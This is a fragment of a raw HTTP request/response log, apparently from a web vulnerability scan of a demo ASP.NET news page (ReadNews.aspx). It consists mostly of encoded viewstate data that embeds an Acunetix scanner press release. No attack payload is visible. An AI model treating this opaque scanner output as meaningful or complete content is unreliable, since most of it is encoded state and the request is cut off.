gICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BNTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BRmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BJnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc%2BPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk%2BRGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk%2BRmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk%2BPGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk%2BIDwvdWw%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BVXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYCHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0yZGQCCw8WAh4Dc3JjBQxhZHMvZGVmLmh0bWxkZCqQXr9Bo%2Bfii5vVAAhGyfGRVNk1&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwLjj6S6DAL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBJXwOObHp1dq30nemUavTDCszjxx
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:17 GMT Content-Length: 30642
Response Body - size: 30,642 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&id=2" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc+QWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+NTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+RmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+JnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz